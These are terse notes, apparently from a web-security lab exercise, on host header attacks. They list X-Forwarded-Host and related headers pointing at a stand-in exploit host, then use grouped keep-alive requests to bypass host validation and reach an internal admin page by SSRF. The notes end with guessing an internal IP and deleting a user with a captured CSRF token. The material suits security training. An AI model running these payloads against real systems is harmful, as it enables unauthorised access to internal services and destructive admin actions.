#use one of this
X-Forwarded-Host: EXPLOIT.net
X-Host: EXPLOIT.net
X-Forwarded-Server: EXPLOIT.net
Sending grouped request in sequence using single connection and setting the connection header to keep-alive, bypass host header validation and enable SSRF exploit of local server.
Try to get to the admin page through localhost or lan ip. Collaborator request will confirm that it is possible to access out of band resource
#Full path in request
GET / or https://YOUR-LAB-ID.web-security-academy.net/
Host: BURP-COLLABORATOR-SUBDOMAIN or 192.168.0.$$
#than try to guess ip from intruder and run admin to get csrf and then do action
GET /admin
Host: 192.168.0.17
GET /admin/delete?csrf=jslsjf?username=carlos
Host: 192.168.0.17